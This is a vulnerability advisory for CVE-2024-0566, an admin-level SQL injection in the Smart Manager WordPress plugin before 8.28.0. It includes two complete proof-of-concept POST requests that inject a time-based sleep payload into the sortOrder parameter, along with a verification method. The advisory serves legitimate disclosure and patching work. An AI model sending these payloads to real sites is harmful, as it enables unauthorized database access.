WordPress Plugin Vulnerabilities

Smart Manager < 8.28.0 - Admin+ SQL Injection

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.

Proof of Concept

The vulnerability can be demonstrated using the following POST request:

POST /wp-admin/admin-ajax.php?action=sm_beta_include_file HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/admin.php?page=smart-manager
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1117
Origin: http://localhost
Connection: close
Cookie: Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

cmd=get_data_model&active_module=product&security=37e8d818b7&is_public=1&sm_page=1&sm_limit=50&SM_IS_WOO30=true&sort_params%5Bcolumn%5D=postmeta%2Fmeta_key%3D_tax_status%2Fmeta_value%3D_tax_status&sort_params%5BsortOrder%5D=asc%2c(select*from(select(sleep(20)))a)&table_model%5Bposts%5D%5Bpkey%5D=ID&table_model%5Bposts%5D%5Bjoin_on%5D=&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D%5B%5D=product&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D%5B%5D=product_variation&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_status%5D=any&table_model%5Bpostmeta%5D%5Bpkey%5D=post_id&table_model%5Bpostmeta%5D%5Bjoin_on%5D=postmeta.post_ID+%3D+posts.ID&table_model%5Bterm_relationships%5D%5Bpkey%5D=object_id&table_model%5Bterm_relationships%5D%5Bjoin_on%5D=term_relationships.object_id+%3D+posts.ID&table_model%5Bterm_taxonomy%5D%5Bpkey%5D=term_taxonomy_id&table_model%5Bterm_taxonomy%5D%5Bjoin_on%5D=term_taxonomy.term_taxonomy_id+%3D+term_relationships.term_taxonomy_id&table_model%5Bterms%5D%5Bpkey%5D=term_id&table_model%5Bterms%5D%5Bjoin_on%5D=terms.term_id+%3D+term_taxonomy.term_id&search_text=&advanced_search_query=%5B%5D&is_view=0&isTasks=0&is_taxonomy=0


Verification Method:

Run the request on a WordPress instance running Smart Manager v8.27.0.

If the server response is delayed by approximately 20 seconds, it indicates successful exploitation of the time-based SQL Injection, confirming the vulnerability.


---

This is also exploitable through a different SQL query using the following POC:

POST /wp-admin/admin-ajax.php?action=sm_beta_include_file HTTP/2
Host: wpscan-vulnerability-test-bench.ddev.site
Content-Length: 1037
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: text/plain, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://wpscan-vulnerability-test-bench.ddev.site
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin.php?page=smart-manager
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i

cmd=get_data_model&active_module=post&security=14148c8e02&is_public=1&sm_page=1&sm_limit=50&SM_IS_WOO30=&sort_params%5Bcolumn%5D=postmeta%2Fmeta_key%3D_elementor_data%2Fmeta_value%3D_elementor_data&sort_params%5BsortOrder%5D=asc%2c(select*from(select(sleep(5)))a)&table_model%5Bposts%5D%5Bpkey%5D=ID&table_model%5Bposts%5D%5Bjoin_on%5D=&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D=post&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_status%5D=any&table_model%5Bpostmeta%5D%5Bpkey%5D=post_id&table_model%5Bpostmeta%5D%5Bjoin_on%5D=postmeta.post_ID+%3D+posts.ID&table_model%5Bterm_relationships%5D%5Bpkey%5D=object_id&table_model%5Bterm_relationships%5D%5Bjoin_on%5D=term_relationships.object_id+%3D+posts.ID&table_model%5Bterm_taxonomy%5D%5Bpkey%5D=term_taxonomy_id&table_model%5Bterm_taxonomy%5D%5Bjoin_on%5D=term_taxonomy.term_taxonomy_id+%3D+term_relationships.term_taxonomy_id&table_model%5Bterms%5D%5Bpkey%5D=term_id&table_model%5Bterms%5D%5Bjoin_on%5D=terms.term_id+%3D+term_taxonomy.term_id&search_text=&advanced_search_query=%5B%5D

Affects Plugins

Plugin icon
smart-manager-for-wp-e-commerce
Fixed in 8.28.0

References

CVE
CVE-2024-0566

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher
Ivan Spiridonov
Submitter
Ivan Spiridonov
Submitter website
https://xbz0n.medium.com
Verified
Yes
WPVDB ID
ca83db95-4a08-4615-aa8d-016022404c32

Timeline

Publicly Published
2024-01-18 (about 3 months ago)
Added
2024-01-18 (about 3 months ago)
Last Updated
2024-01-18 (about 3 months ago)

Other

Published
Title
Published
2015-08-21
Title
Gallery Bank < 3.0.330 - Authenticated Blind SQL Injection
Published
2024-04-07
Title
User Activity Log <= 1.9 - Admin+ SQL Injection
Published
2021-02-08
Title
Data Tables Generator by Supsystic < 1.10.0 - Authenticated SQL Injection
Published
2014-09-27
Title
Quartz Plugin 1.01.1 - SQL Injection
Published
2017-07-21
Title
WordPress Plugin IBPS Online Exam <= 1.0 - Authenticated SQL Injection / Cross-Site Scripting